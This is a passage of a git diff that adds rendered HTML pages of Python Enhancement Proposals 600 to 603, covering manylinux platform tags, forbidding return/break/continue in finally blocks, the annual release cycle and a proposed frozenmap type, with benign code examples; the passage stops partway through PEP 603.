  • manylinux_[0-9]+_[0-9]+_(.*)
  • +
+
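A minimal sketch of an acceptance check built from these regexes (illustrative only; any real index’s policy code will differ):

import re

ACCEPTED_PATTERNS = [
    r"manylinux1_(x86_64|i686)",
    r"manylinux2010_(x86_64|i686)",
    r"manylinux2014_(x86_64|i686|aarch64|armv7l|ppc64|ppc64le|s390x)",
    r"manylinux_[0-9]+_[0-9]+_(.*)",
]

def platform_tag_is_acceptable(tag):
    return any(re.fullmatch(p, tag) for p in ACCEPTED_PATTERNS)

assert platform_tag_is_acceptable("manylinux_2_17_x86_64")
assert not platform_tag_is_acceptable("alpine_3_10_x86_64")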

Package indexes may impose additional requirements; for example, they +might audit uploaded wheels and reject those that contain known +problems, such as a manylinux_2_17 wheel that references symbols +from later glibc versions, or dependencies on external libraries that +are known not to exist on all systems. Or a package index might decide +to be conservative and reject wheels tagged manylinux_2_999, on +the grounds that no-one knows what the Linux distro landscape will +look like when glibc 2.999 is released. We leave the details of any +such checks to the discretion of the package index maintainers.

+
+
+
+

Rejected alternatives

+

Continuing the manylinux20XX series: As discussed above, this +leads to much more effort-intensive, slower, and more complex rollouts +of new versions. And while there are two places where it seems at +first to have some compensating benefits, if you look more closely +this turns out not to be the case.

+

First, this forces us to produce human-readable descriptions of how +Linux distros work, in the text of the PEP. But this is less valuable +than it might seem at first, and can actually be handled better by the +new “perennial” approach anyway.

+

If you’re trying to build wheels, the main thing you need is a +tutorial on how to use the build images and tooling around them. If +you’re trying to add support for a new build profile or create a +competitor to auditwheel, then your best resources will be the +auditwheel source code and issue tracker, which are always going to be +more detailed, precise, and reliable than a summary spec written in +English and without tests. Documentation like the old manylinux20XX +PEPs does add value! But in both cases, it’s primarily as a secondary +reference to provide overview and context.

+

And furthermore, the PEP process is poorly suited to maintaining this +kind of reference documentation – there’s a reason we don’t keep the +pip user manual in the PEPs repository! The auditwheel maintainers are +the best situated to understand what kinds of documentation are useful +to their users, and to maintain that documentation over time. For +example, there’s substantial overlap between the different manylinux +versions, and the PEP process currently forces us to handle this by +copy-pasting everything between a growing list of documents; instead, +the auditwheel maintainers might choose to factor out the common parts +into a single piece of shared documentation.

+

A related concern was that with the perennial approach, it may become harder for package maintainers to decide which build profile to target: instead of having to pick between manylinux1, manylinux2010, manylinux2014, …, they now have a wider array of options like manylinux_2_5, manylinux_2_6, …, manylinux_2_20, … But again, we don’t believe this will be a problem in practice. In either system, most package maintainers won’t be starting by reading PEPs and trying to implement them from scratch. If you’re a particularly expert and ambitious package maintainer who needs to target a new version or new architecture, the perennial approach gives you additional flexibility. But for regular everyday maintainers, we expect they’ll start from a tutorial like packaging.python.org, and by choosing from existing build images. A tutorial can just as easily recommend manylinux_2_17 as it can recommend manylinux2014, and we expect the actual set of pre-provided build images to be identical in both cases. And again, by maintaining this documentation in the right place, instead of trying to do it in the PEPs repository, we expect that we’ll end up with documentation that’s higher-quality and more fitted to purpose.

+

Finally, some participants have pointed out that it’s very nice to be +able to look at a wheel and tell definitively whether it meets the +requirements of the spec. With the new “perennial” approach, we can +never say with 100% certainty that a wheel does meet the spec, because +that depends on the Linux distros. As engineers we have a +well-justified dislike for that kind of uncertainty.

+

However: as demonstrated by the examples above, we can still tell definitively when a wheel doesn’t meet the spec, which turns out to be what’s important in practice. And, in practice, with the manylinux20XX approach, whenever distros change, we actually change the spec; it just takes a bit longer. So even if a wheel was compliant today, it might become non-compliant tomorrow. This is frustrating, but unfortunately this uncertainty is unavoidable if what you care about is distributing working wheels to users.

+

So even on these points where the old approach initially seems to have +advantages, we expect the new approach to actually do as well or +better.

+

Switching to perennial tags, but continuing to write a PEP for each +version: This was proposed as a kind of hybrid, to try to get some +of the advantages of the perennial tagging system – like easier +rollouts of new versions – while keeping the advantages of the +manylinux20XX scheme, like forcing us to write documentation about +Linux distros, simplifying options for package maintainers, and being +able to definitively tell when a wheel meets the spec. But as +discussed above, on a closer look, it turns out that these advantages +are largely illusory. And this also inherits significant +disadvantages from the manylinux20XX scheme, like creating +indefinite obligations to update a growing list of copy-pasted PEPs.

+

Making auditwheel normative: Another possibility that was +considered was to make auditwheel the normative reference on the +definition of manylinux, i.e., a wheel would be compliant if and only +if auditwheel check completed without errors. This was rejected +because the point of packaging PEPs is to define interoperability +between tools, not to bless specific tools.

+

Adding extra words to the tag string: Another proposal we +considered was to add extra words to the wheel tag, e.g. +manylinux_glibc_2_17 instead of manylinux_2_17. The motivation +would be to leave the door open to other kinds of versioning +heuristics in the future – for example, we could have +manylinux_glibc_$VERSION and manylinux_alpine_$VERSION.

+

But “manylinux” has always been a synonym for “broad compatibility +with mainstream glibc-based distros”; reusing it for unrelated build +profiles like alpine is more confusing than helpful. Also, some early +reviewers who aren’t steeped in the details of packaging found the +word glibc actively misleading, jumping to the conclusion that it +meant they needed a system with exactly that glibc version. And tags +like manylinux_$VERSION and alpine_$VERSION also have the +advantages of parsimony and directness. So we’ll go with that.

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0600.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0601/index.html b/pep-0601/index.html new file mode 100644 index 00000000000..5aef9ae2b87 --- /dev/null +++ b/pep-0601/index.html @@ -0,0 +1,373 @@ PEP 601 – Forbid return/break/continue breaking out of finally | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 601 – Forbid return/break/continue breaking out of finally

+
+
Author:
+
Damien George, Batuhan Taskaya
+
Sponsor:
+
Alyssa Coghlan
+
Discussions-To:
+
Discourse thread
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
26-Aug-2019
+
Python-Version:
+
3.8
+
Post-History:
+
26-Aug-2019, 23-Sep-2019
+
Superseded-By:
+
765
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Rejection Note

+

This PEP was rejected by the Steering Council by a vote of 4/4.

+

Guido’s arguments for rejecting the PEP are: “it seems to me that most languages +implement this kind of construct but have style guides and/or linters that +reject it. I would support a proposal to add this to PEP 8”, and “I note that +the toy examples are somewhat misleading – the functionality that may be useful +is a conditional return (or break etc.) inside a finally block.”.

+
+
+

Abstract

+

This PEP proposes to forbid return, break and continue statements within +a finally suite where they would break out of the finally. Their use in +such a location silently cancels any active exception being raised through +the finally, leading to unclear code and possible bugs.

+

continue is currently not supported in a finally in Python 3.7 (due to +implementation issues) and the proposal is to not add support for it in +Python 3.8. For return and break the proposal is to deprecate their use +in Python 3.9, emit a compilation warning in Python 3.10 and then forbid +their use after that.

+
+
+

Motivation

+

The use of return, break and continue within a finally suite leads to behaviour +which is not at all obvious. Consider the following function:

+
def foo():
+    try:
+        foo()
+    finally:
+        return
+
+
+

This will return cleanly (without an exception) even though it has infinite +recursion and raises an exception within the try. The reason is that the return +within the finally will silently cancel any exception that propagates through +the finally suite. Such behaviour is unexpected and not at all obvious. +This function is equivalent to:

+
def foo():
+    try:
+        foo()
+    except:
+        pass
+    return
+
+
+

break and continue have similar behaviour (they silence exceptions) if they +jump to code outside the finally suite. For example:

+
def bar():
+    while True:
+        try:
+            1 / 0
+        finally:
+            break
+
+
+

This behaviour goes against the following parts of The Zen of Python:

+
    +
  • Explicit is better than implicit - exceptions are implicitly silenced
  • +
  • Readability counts - the intention of the code is not obvious
  • +
  • Errors should never pass silently; Unless explicitly silenced - exceptions +are implicitly silenced
  • +
+

If this behaviour of silencing exceptions is really needed then the explicit +form of a try-except can be used instead, and this makes the code clearer.

+

Independently of the semantics, implementing return/break/continue within a finally suite is non-trivial as it requires correctly tracking any active exceptions at runtime (an executing finally suite may or may not have an active exception) and cancelling them as appropriate. CPython did have a bug in this for the case of continue and so originally disallowed it [1]. Requiring correct behaviour for return/break/continue within a finally puts an unnecessary burden on alternative implementations of Python.

+
+
+

Other languages

+

Java allows returning from within a finally block, but its use is discouraged according to [2], [3], [4]. The Java compiler later included a linting option -Xlint:finally to warn against the use of return within a finally block. The Eclipse editor also warns about this use.

+

Ruby allows return from inside ensure (Python’s finally), but it should be an +explicit return. It is discouraged and handled by linters [5], [6].

+

Like Ruby, JavaScript also allows use of return/break/continue within a finally +but it is seen as unsafe and it is handled by eslint [7].

+

C# forbids the use of ending statements like return/goto/break within a finally +[8], [9].

+
+
+

Rationale

+

Since the behaviour of return/break/continue within a finally is unclear, the +pattern is rarely used, and there is a simple alternative to writing equivalent +code (which is more explicit), forbidding the syntax is the most straightforward +approach.

+
+
+

Specification

+

This is a change to the compiler, not the grammar. The compiler should +check for the following in a finally suite:

+
    +
  • A return in any statement, at any level of nesting.
  • +
  • A break/continue in any statement, at any level of nesting, that would +transfer control flow outside the finally suite.
  • +
+

Upon finding such a case it should emit the appropriate exception:

+
    +
  • For continue, a SyntaxError (this is the current behaviour of 3.7).
  • +
  • For return/break, a SyntaxWarning in 3.10, and a SyntaxError after that.
  • +
+

For example, the following are all forbidden by this proposal:

+
def f():
+    try:
+        pass
+    finally:
+        return
+
+def g():
+    try:
+        pass
+    finally:
+        try:
+            return
+        finally:
+            pass
+
+def h():
+    try:
+        pass
+    finally:
+        try:
+            pass
+        finally:
+            for x in range(10):
+                return
+
+
+

The following is still allowed because the continue doesn’t escape the +finally:

+
try:
+    pass
+finally:
+    for x in range(10):
+        continue
+
+
+

Note that yielding from within a finally remains acceptable by this PEP +because resuming the generator will resume the finally and eventually +raise any active exceptions (so they are never silenced by yielding).

+
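A small sketch of why this is safe (behaviour as in current CPython): the active exception is merely paused while the generator is suspended, and propagates once the finally completes:

def gen():
    try:
        1 / 0
    finally:
        yield "cleanup"   # allowed: the yield does not escape the finally

g = gen()
print(next(g))            # "cleanup"; the ZeroDivisionError is paused
try:
    next(g)               # resuming the finally re-raises the exception
except ZeroDivisionError:
    print("exception was preserved")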
+
+

Backwards Compatibility

+

This is a backwards incompatible change, for return and break.

+

The following locations in the CPython standard library (at +v3.8.0b1-651-g7fcc2088a5) use return within finally:

+
    +
  • Lib/subprocess.py:921 - the use here looks like a bug
  • +
  • Lib/multiprocessing/connection.py:316 - the use here looks legitimate +but the intention is not clear
  • +
  • Lib/multiprocessing/connection.py:318 - the use here looks legitimate +but the intention is not clear
  • +
  • Lib/test/test_sys_settrace.py:837 - a test for return within finally
  • +
  • Lib/test/test_sys_settrace.py:1346 - a test for return within finally
  • +
+

There are no uses of break within a finally (that break out of the finally) +in the standard library.

+
+
+

Security Implications

+

This is a simplification of the language, and removal of associated code, +so should not introduce any new paths for a security exploit.

+
+
+

How to Teach This

+

This feature is very rarely used, so forbidding it will likely only impact advanced users, not beginners and probably not any existing teaching material. Since this is the removal of a feature, teaching users will be done by the raising of a SyntaxError if/when the forbidden feature is used.

+
+
+

Reference Implementation

+

There is currently no reference implementation, although the way continue +is currently handled in a finally (raising a SyntaxError) can be extended +to return and break.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0601.rst

+

Last modified: 2024-11-20 11:56:53 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0602/index.html b/pep-0602/index.html new file mode 100644 index 00000000000..4522d11f53e --- /dev/null +++ b/pep-0602/index.html @@ -0,0 +1,479 @@ PEP 602 – Annual Release Cycle for Python | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 602 – Annual Release Cycle for Python

+
+
Author:
+
Łukasz Langa <lukasz at python.org>
+
PEP-Delegate:
+
Brett Cannon <brett at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Active
+
Type:
+
Process
+
Created:
+
04-Jun-2019
+
Python-Version:
+
3.9
+
Post-History:
+
09-Oct-2023
+
Resolution:
+
Python-Dev thread
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes a change in the release calendar for Python +starting with Python 3.9. This change accelerates the release cadence +such that feature versions are released predictably every twelve months, +in October every year.

+
+
+

Implementation

+
+

Seventeen months to develop a feature version

+

This PEP proposes that Python 3.X.0 will be developed for around +17 months:

+
    +
  • The first five months overlap with Python 3.(X-1).0’s beta +and release candidate stages and are thus unversioned.
  • +
  • The next seven months are spent on versioned alpha releases where +both new features are incrementally added and bug fixes are included.
  • +
  • The following three months are spent on four versioned beta releases +where no new features can be added but bug fixes are still +included.
  • +
  • The final two months are spent on two release candidates (or more, +if necessary) and conclude with the release of the final release of +Python 3.X.0.
  • +
+
+
+

2 years of full support, 3 more years of security fixes

+

After the release of Python 3.X.0, the 3.X series is maintained for +five years:

+
    +
  • During the first twenty four months (2 years) it receives bugfix +updates and full releases (sources and installers for Windows and +macOS) are made approximately every other month.
  • +
  • For the next thirty six months (3 years) it receives security +updates and source-only releases are made on an as-needed basis +(no fixed cadence).
  • +
  • The final source-only release is made five years after 3.X.0.
  • +
+

Note: 2 years of full support start with Python 3.13. Python versions 3.9 - 3.12 operate on a calendar with 1½ years of full support, followed by 3½ more years of security fixes.

+
+
+

Annual release cadence

+

Feature development of Python 3.(X+1).0 starts as soon as +Python 3.X.0 Beta 1 is released. This creates a twelve-month delta +between Python feature versions.

+
+
+
+

Example

+
    +
  • 3.9 development begins: Tuesday, 2019-06-04
  • +
  • 3.9.0 alpha 1: Monday, 2019-10-14
  • +
  • 3.9.0 alpha 2: Monday, 2019-11-18
  • +
  • 3.9.0 alpha 3: Monday, 2019-12-16
  • +
  • 3.9.0 alpha 4: Monday, 2020-01-13
  • +
  • 3.9.0 alpha 5: Monday, 2020-02-17
  • +
  • 3.9.0 alpha 6: Monday, 2020-03-16
  • +
  • 3.9.0 alpha 7: Monday, 2020-04-13
  • +
  • 3.9.0 beta 1: Monday, 2020-05-18 +(No new features beyond this point.)
  • +
  • 3.9.0 beta 2: Monday, 2020-06-08
  • +
  • 3.9.0 beta 3: Monday, 2020-06-29
  • +
  • 3.9.0 beta 4: Monday, 2020-07-20
  • +
  • 3.9.0 candidate 1: Monday, 2020-08-10
  • +
  • 3.9.0 candidate 2: Monday, 2020-09-14
  • +
  • 3.9.0 final: Monday, 2020-10-05
  • +
+
+../_images/pep-0602-example-release-calendar.png + +
+

Figure 1. Consequences of the annual release cycle on the calendar.

+
+
+

In comparison, if this PEP is rejected and Python keeps the current +release schedule:

+
    +
  • 3.9 development begins: Tuesday, 2019-06-04
  • +
  • 3.9.0 alpha 1: Monday, 2020-08-03 (10 months later)
  • +
  • 3.9.0 alpha 2: Monday, 2020-09-07
  • +
  • 3.9.0 alpha 3: Monday, 2020-10-05
  • +
  • 3.9.0 alpha 4: Monday, 2020-11-02
  • +
  • 3.9.0 beta 1: Monday, 2020-11-30 (6 months later)
  • +
  • 3.9.0 beta 2: Monday, 2021-01-04
  • +
  • 3.9.0 beta 3: Monday, 2021-02-01
  • +
  • 3.9.0 beta 4: Monday, 2021-03-01
  • +
  • 3.9.0 candidate 1: Monday, 2021-03-29
  • +
  • 3.9.0 candidate 2: Monday, 2021-04-05 (if necessary)
  • +
  • 3.9.0 final: Monday, 2021-04-19 (6 months later)
  • +
+
+
+

Dependent Policies

+
+

Deprecations

+

The current policy around breaking changes assumes at least two releases +before a deprecated feature is removed from Python or a __future__ +behavior is enabled by default. This is documented in PEP 387.

+

This PEP proposes to keep this policy of at least two releases +before making a breaking change.

+
+
+

The term of the Steering Council

+

The current wording of PEP 13 states that “a new council is elected +after each feature release”. This PEP proposes to keep this policy +as it will lead to a consistent election schedule.

+
+
+

The term of the Release Manager

+

The current undocumented convention is for a single Release Manager to +handle two feature releases of Python. This PEP proposes to keep this +policy, allowing for the term to be extended to more releases with +approval from the Steering Council and the Cabal of Release Managers.

+

In particular, since this PEP is authored by the active Release Manager +and its effect would shorten the term of the Release Manager, the author +is open to managing the release of a third feature release to compensate +for the disruption.

+
+
+
+

Rationale and Goals

+

This change provides the following advantages:

+
    +
  • makes releases smaller: since doubling the cadence doesn’t double our +available development resources, consecutive releases are going to be +smaller in terms of features;
  • +
  • puts features and bug fixes in hands of users sooner;
  • +
  • creates a more gradual upgrade path for users, by decreasing the +surface of change in any single release;
  • +
  • creates a predictable calendar for releases where the final release is +always in October (so after the annual core sprint), and the beta +phase starts in late May (so after PyCon US sprints), which is +especially important for core developers who need to plan to include +Python involvement in their calendar;
  • +
  • decreases the urge to rush features shortly before “Beta 1” due to +the risk of them “slipping for 18 months”;
  • +
  • allows for synchronizing the schedule of Python release management +with external distributors like Fedora who’ve been historically very +helpful in finding regressions early not only in core Python but also +in third-party libraries, helping moving the community forward to +support the latest version of Python from Day 1;
  • +
  • increases the explicit alpha release phase, which provides meaningful +snapshots of progress on new features;
  • +
  • significantly cuts the implicit “alpha 0” release phase which provides +limited use for new development anyway (it overlaps with the beta of +the currently developed, still unreleased, version).
  • +
+
+

Non-goals

+

Adopting an annual release calendar allows for natural switching to +calendar versioning, for example by calling Python 3.9 “Python 3.20” +since it’s released in October ‘20 and so on (“Python 3.23” would be the +one released in October ‘23).

+

While the ease of switching to calendar versioning can be treated as +an advantage of an annual release cycle, this PEP does not advocate for +or against a change in how Python is versioned. Should the annual +release cycle be adopted, the versioning question will be dealt with in +a separate PEP.

+
+
+

Non-risks

+

This change does not shorten the currently documented support calendar +for a Python release, both in terms of bugfix releases and security +fixes.

+

This change does not accelerate the velocity of development. Python is +not going to become incompatible faster or accrue new features faster. +It’s just that features are going to be released more gradually as they +are developed.

+

Consequently, while this change introduces the ability for users to +upgrade much faster, it does not require them to do so. Say, if they +upgrade every second release, their experience with Python is going to +be similar to the current situation.

+
+
+

Risks

+
+

Python redistribution

+

This requires changes to how integrators, like Linux distributions, +release Python within their systems.

+
+
+

The testing matrix

+

This eventually increases the testing matrix for library and application +maintainers that want to support all actively supported Python versions +by one or two:

+
+../_images/pep-0602-overlapping-support-matrix.png + +
+

Figure 2. Testing matrix in the 18-month cadence vs. the 12-month cadence.

+
+
+

The “extended bugfix support at the discretion of the Release Manager” stage of the current release cycle is not codified. In fact, PEP 101 currently states that after the release of Python 3.(X+1).0 only one last bugfix release is made for Python 3.X.0. However, in practice at least the last four versions of Python 3 overlapped with stable releases of the next version for around six months. Figure 2 includes this information to demonstrate that overlap between stable version releases with the 12-month release cadence will be nothing new.

+
+
+

Other policies may depend on the release cadence

+

Although identified dependent policies were addressed in a previous +section, it is entirely possible there are some other areas which +implicitly rely on the timing of Python releases.

+
+
+
+

Rejected Ideas

+
+

Keep the current 18 month release cadence

+

This is undesirable both for core developers and end users. From the +perspective of the core developer:

+
    +
  • it makes contribution scheduling harder due to irregular release +dates every year;
  • +
  • it creates a surge of rushed commits before (and even after!) Beta 1 +due to the stress involved with “missing a release”;
  • +
  • ironically, after Beta 1 it creates a false sense of having “plenty of +time” before the next release, time that passes quickly regardless;
  • +
  • it causes certain elements of the workflow to be executed so rarely +that they are not explicitly documented, let alone automated.
  • +
+

More importantly, from the perspective of the user:

+
    +
  • it creates releases with many new features, some being explicitly +incompatible and some being accidentally incompatible, which makes +the upgrade cost relatively high every time;
  • +
  • it sits on features and incompatible bug fixes for over a year before +becoming available to the user; and more specifically
  • +
  • it causes every “point zero” release to be extra risky for users. +While we provide and recommend testing with alphas and betas, +“point zero” is the first release of a given Python version for many +users. The bigger a release is feature-wise, the more potential +problems are hiding in “point zero releases”.
  • +
+
+
+

Double the release cadence to achieve 9 months between feature versions

+

This was originally proposed in PEP 596 and rejected as both too +irregular and too short. This would not give any of the benefits of +a regular release calendar but it would shorten all development phases, +especially the beta + RC phases. This was considered dangerous.

+
+
+

Keep “4 betas over 4 months and a final month for the release candidate”

+

While this would make the release calendar a bit cleaner, it would make +it very hard for external distributors like Fedora +to release the newest version of Python as soon as possible. We are +adjusting Python’s calendar here in the hope that this will enable +Fedora to integrate the newest version of Python with the newest version +of Fedora as both are being developed which makes both projects +better.

+
+
+

Slow down releases but don’t freeze feature development with Beta 1

+

This is described in PEP 598. This proposal includes non-standard +concepts like the “incremental feature release” which makes it hard +to understand. The presented advantages are unclear while the +unfamiliarity of the scheme poses a real risk of user and integrator +confusion.

+
+
+

Long-Term Support Releases

+

Each version of Python is effectively long-term support: it’s supported +for five years, with the first eighteen months allowing regular bug +fixes and security updates. For the remaining time security updates are +accepted and promptly released.

+

No extended support in the vein of Python 2.7 is planned going forward.

+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0602.rst

+

Last modified: 2024-05-28 05:47:01 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0603/index.html b/pep-0603/index.html new file mode 100644 index 00000000000..b89a3ad5236 --- /dev/null +++ b/pep-0603/index.html @@ -0,0 +1,537 @@ PEP 603 – Adding a frozenmap type to collections | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 603 – Adding a frozenmap type to collections

+
+
Author:
+
Yury Selivanov <yury at edgedb.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Created:
+
12-Sep-2019
+
Post-History:
+
12-Sep-2019
+
+
+
+
Table of Contents +
+
+

Abstract

+

A persistent data structure is defined as a data structure that +preserves the previous version of the data when the data is modified. +Such data structures are effectively immutable, as operations on +them do not update the structure in-place, but instead always yield +a new updated structure (see [0] for more details.)

+

This PEP proposes to add a new fully persistent and immutable mapping +type called frozenmap to the collections module.

+

The bulk of frozenmap’s reference implementation is already +used in CPython to implement the contextvars module.

+
+
+

Rationale

+

Python has two immutable collection types: tuple and +frozenset. These types can be used to represent immutable lists +and sets. However, a way to represent immutable mappings does not yet +exist, and this PEP proposes a frozenmap to implement an +immutable mapping.

+

The proposed frozenmap type:

+
    +
  • implements the collections.abc.Mapping protocol,
  • +
  • supports pickling, and
  • +
  • provides an API for efficient creation of “modified” versions.
  • +
+

The following use cases illustrate why an immutable mapping is +desirable:

+
    +
  • Immutable mappings are hashable which allows their use +as dictionary keys or set elements.

This hashable property permits functions decorated with @functools.lru_cache() to accept immutable mappings as arguments. Unlike an immutable mapping, passing a plain dict to such a function results in an error (see the sketch after this list).

    +
  • +
  • Immutable mappings can hold complex state. Since immutable mappings +can be copied by reference, transactional mutation of state can be +efficiently implemented.
  • +
  • Immutable mappings can be used to safely share dictionaries across +thread and asynchronous task boundaries. The immutability makes it +easier to reason about threads and asynchronous tasks.
  • +
+
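As promised above, here is a sketch of the hashability point. It assumes the proposed frozenmap were available from collections as specified in this PEP:

import functools
from collections import frozenmap  # proposed in this PEP

@functools.lru_cache()
def query(options):
    return sorted(options)

query(frozenmap(timeout=10, retries=3))   # fine: frozenmap is hashable
try:
    query({'timeout': 10, 'retries': 3})
except TypeError as e:
    print(e)                              # unhashable type: 'dict'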

Lastly, CPython [1] already contains the main portion of the C code +required for the frozenmap implementation. The C code already +exists to implement the contextvars module (see PEP 567 for +more details.) Exposing this C code via a public collection type +drastically increases the number of users of the code. This leads to +increased code quality by discovering bugs and improving performance +which without a frozenmap collection would be very challenging +because most programs use the contextvars module indirectly.

+
+
+

Specification

+

A new public immutable type frozenmap is added to the +collections module.

+
+

Construction

+

frozenmap implements a dict-like construction API:

+
    +
  • frozenmap() creates a new empty immutable mapping;
  • +
  • frozenmap(**kwargs) creates a mapping from **kwargs, e.g. +frozenmap(x=10, y=0, z=-1)
  • +
  • frozenmap(collection) creates a mapping from the passed +collection object. The passed collection object can be:
      +
    • a dict,
    • +
    • another frozenmap,
    • +
    • an object with an items() method that is expected to return +a series of key/value tuples, or
    • +
    • an iterable of key/value tuples.
    • +
    +
  • +
+
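For example, each of the following would construct an equivalent mapping (a sketch using the proposed API):

m1 = frozenmap(x=10, y=0, z=-1)                    # from keyword arguments
m2 = frozenmap({'x': 10, 'y': 0, 'z': -1})         # from a dict
m3 = frozenmap([('x', 10), ('y', 0), ('z', -1)])   # from key/value tuples
m4 = frozenmap(m1)                                 # from another frozenmap

assert m1 == m2 == m3 == m4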
+
+

Data Access

+

frozenmap implements the collections.abc.Mapping protocol. Therefore, getters, membership checks, and iteration work the same way that they would for a dict:

+
m = frozenmap(foo='bar')
+
+assert m['foo'] == 'bar'
+assert m.get('foo') == 'bar'
+assert 'foo' in m
+
+assert 'baz' not in m
+assert m.get('baz', 'missing') == 'missing'
+
+assert m == m
+assert m != frozenmap()  # m is not equal to an empty frozenmap
+
+assert len(m) == 1
+
+# etc.
+
+
+
+
+

Mutation

+

frozenmap instances are immutable. That said, it is possible +to efficiently produce mutated copies of the immutable instance.

+

The complexity of mutation operations is O(log N) and the resulting +frozenmap copies often consume very little additional memory due +to the use of structural sharing (read [6] for more details.)

+
+

frozenmap.including(key, value)

+

The method creates a new frozenmap copy with a new key / value +pair:

+
m = frozenmap(foo=1)
+m2 = m.including('bar', 100)
+
+print(m)   # will print frozenmap({'foo': 1})
+print(m2)  # will print frozenmap({'foo': 1, 'bar': 100})
+
+
+
+
+

frozenmap.excluding(key)

+

The method produces a copy of the frozenmap which does not +include a deleted key:

+
m = frozenmap(foo=1, bar=100)
+
+m2 = m.excluding('foo')
+
+print(m)   # will print frozenmap({'foo': 1, 'bar': 100})
+print(m2)  # will print frozenmap({'bar': 100})
+
+m3 = m.excluding('spam')  # will throw a KeyError('spam')
+
+
+
+
+

frozenmap.union(mapping=None, **kw)

+

The method produces a copy of the frozenmap and adds or modifies +multiple key/values for the created copy. The signature of +the method matches the signature of the frozenmap constructor:

+
m = frozenmap(foo=1)
+
+m2 = m.union({'spam': 'ham'})
+print(m2)  # will print frozenmap({'foo': 1, 'spam': 'ham'})
+
+m3 = m.union(foo=100, y=2)
+print(m3)  # will print frozenmap({'foo': 100, 'y': 2})
+
+print(m)   # will print frozenmap({'foo': 1})
+
+
+

Calling the union() method to add/replace N keys is more efficient +than calling the including() method N times.

+
+
+

frozenmap.mutating()

+

The method allows efficient copying of a frozenmap instance with +multiple modifications applied. This method is especially useful +when the frozenmap in question contains thousands of key/value pairs +and there’s a need to update many of them in a performance-critical +section of the code.

+

The frozenmap.mutating() method returns a mutable dict-like +copy of the frozenmap object: an instance of +collections.FrozenMapCopy.

+

The FrozenMapCopy objects:

+
    +
  • are copy-on-write views of the data of frozenmap instances +they were created from;
  • +
  • are mutable, although any mutations on them do not affect the +frozenmap instances they were created from;
  • +
  • can be passed to the frozenmap constructor; creating a +frozenmap from a FrozenMapCopy object is an O(1) +operation;
  • +
  • have O(log N) complexity for get/set operations; creating +them is an O(1) operation;
  • +
  • have a FrozenMapCopy.close() method that prevents any +further access/mutation of the data;
  • +
  • can be used as a context manager.
  • +
+

The below example illustrates how mutating() can be used with +a context manager:

+
numbers = frozenmap((i, i ** 2) for i in range(1_000_000))
+
+with numbers.mutating() as copy:
+    for i in numbers:
+        if not (numbers[i] % 997):
+            del copy[i]
+
+    numbers_without_997_multiples = frozenmap(copy)
+
+    # at this point, *numbers* still has 1_000_000 key/values, and
+    # *numbers_without_997_multiples* is a copy of *numbers* without
+    # values that are multiples of 997.
+
+    for i in numbers:
+        if not (numbers[i] % 593):
+            del copy[i]
+
+    numbers_without_593_multiples = frozenmap(copy)
+
+    print(copy[10])  # will print 100.
+
+print(copy[10])  # This will throw a ValueError as *copy*
+                 # has been closed when the "with" block
+                 # was exited.
+
+
+
+
+
+

Iteration

+

As frozenmap implements the standard collections.abc.Mapping protocol, all expected methods of iteration are supported:

+
assert list(m) == ['foo']
+assert list(m.items()) == [('foo', 'bar')]
+assert list(m.keys()) == ['foo']
+assert list(m.values()) == ['bar']
+
+
+

Iteration in frozenmap, unlike in dict, does not preserve the +insertion order.

+
+
+

Hashing

+

frozenmap instances are hashable as long as all of their values are hashable, just like tuple objects:

+
hash(frozenmap(foo='bar'))  # works
+hash(frozenmap(foo=[]))     # will throw an error
+
+
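This also means that, like tuples, frozenmap instances can serve as dictionary keys or set elements (a sketch using the proposed API):

routes = {frozenmap(host='db1', port=5432): 'primary'}
assert routes[frozenmap(host='db1', port=5432)] == 'primary'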
+
+
+

Typing

+

It is possible to use the standard typing notation for frozenmaps:

+
m: frozenmap[str, int] = frozenmap()
+
+
+
+
+
+

Implementation

+

The proposed frozenmap immutable type uses a Hash Array Mapped +Trie (HAMT) data structure. Functional programming languages, +like Clojure, use HAMT to efficiently implement immutable hash tables, +vectors, and sets.

+
+

HAMT

+

The key design contract of HAMT is the guarantee of a predictable value when given the hash of a key. For a given key/value pair, the hash of the key can be used to determine the location of the value in the hash map tree.

+

Immutable mappings implemented with HAMT have O(log N) performance +for set() and get() operations. This efficiency is possible +because mutation operations only affect one branch of the tree, +making it possible to reuse non-mutated branches, and, therefore, +avoiding copying of unmodified data.

+
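The practical consequence of structural sharing is that producing a modified copy is cheap even for very large mappings, as in this sketch using the proposed API:

big = frozenmap((i, i * i) for i in range(1_000_000))

# Only the O(log N) nodes along one branch are copied; all other
# branches of the tree are shared between *big* and *bigger*.
bigger = big.including(-1, 1)

assert len(big) == 1_000_000
assert len(bigger) == 1_000_001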

Read more about HAMT in [5]. The CPython implementation [1] has a +fairly detailed description of the algorithm as well.

+
+
+

Performance

+
+../_images/pep-0603-hamt_vs_dict.png + +
+

Figure 1. Benchmark code can be found here: [3].

+
+
+

The above chart demonstrates that:

+
    +
  • frozenmap implemented with HAMT displays near O(1) performance +for all benchmarked dictionary sizes.
  • +
  • dict.copy() becomes less efficient once the dictionary holds around 100-200 items.
  • +
+
+../_images/pep-0603-lookup_hamt.png + +
+

Figure 2. Benchmark code can be found here: [4].

+
+
+

Figure 2 compares the lookup costs of dict versus a HAMT-based immutable mapping. HAMT lookup time is ~30% slower than Python dict lookups on average. This performance difference exists because traversing a shallow tree is less efficient than a lookup in a flat contiguous array.

+

Further to that, quoting [6]: “[using HAMT] means that in practice +while insertions, deletions, and lookups into a persistent hash array +mapped trie have a computational complexity of O(log n), for most +applications they are effectively constant time, as it would require +an extremely large number of entries to make any operation take more +than a dozen steps.”

+
+
+
+

Design Considerations

+
+

Why “frozenmap” and not “FrozenMap”

+

